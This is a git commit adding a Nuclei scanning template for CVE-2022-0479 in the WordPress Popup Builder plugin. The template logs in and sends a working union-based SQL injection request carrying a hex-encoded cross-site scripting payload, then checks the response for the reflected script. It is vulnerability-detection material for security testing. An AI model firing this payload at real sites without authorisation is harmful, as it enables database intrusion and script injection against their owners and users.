Merge pull request #11151 from projectdiscovery/CVE-2022-0479

Create CVE-2022-0479.yaml
2024-11-07 18:59:26 +05:30 · 2024-11-07 18:59:26 +05:30 · da0c52fa32
parent 3876a04272 ea694c0b4b
commit da0c52fa32
1 changed files with 71 additions and 0 deletions
--- a/http/cves/2022/CVE-2022-0479.yaml
+++ b/http/cves/2022/CVE-2022-0479.yaml
@ -0,0 +1,71 @@
+id: CVE-2022-0479
+
+info:
+  name: Popup Builder Plugin - SQL Injection and Cross-Site Scripting
+  author: ritikchaddha
+  severity: critical
+  description: |
+    The Popup Builder WordPress plugin before 4.1.1 is vulnerable to SQL Injection and Reflected XSS via the sgpb-subscription-popup-id parameter.
+  impact: |
+    Allows attackers to execute malicious SQL queries and inject scripts into web pages
+  remediation: |
+    Update Popup Builder Plugin to the latest secure version
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0479
+    cwe-id: CWE-89
+    epss-score: 0.0017
+    epss-percentile: 0.53299
+    cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: sygnoos
+    product: popup_builder
+    framework: wordpress
+    fofa-query: body="/wp-content/plugins/popup-builder"
+  tags: cve,cve2022,wp,wp-plugin,wordpress,popup-builder,xss,sqli,authenticated
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(tolower(body), "/wp-content/plugins/popup-builder")'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscription-popup-id=0%29+union+all++select+1%2C0x3c696d6720737263206f6e6572726f723d616c65727428646f63756d656e742e646f6d61696e293e%2C3%2C4%2C5%2C6+--+g HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<img src=onerror=alert(document.domain)></td><td>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200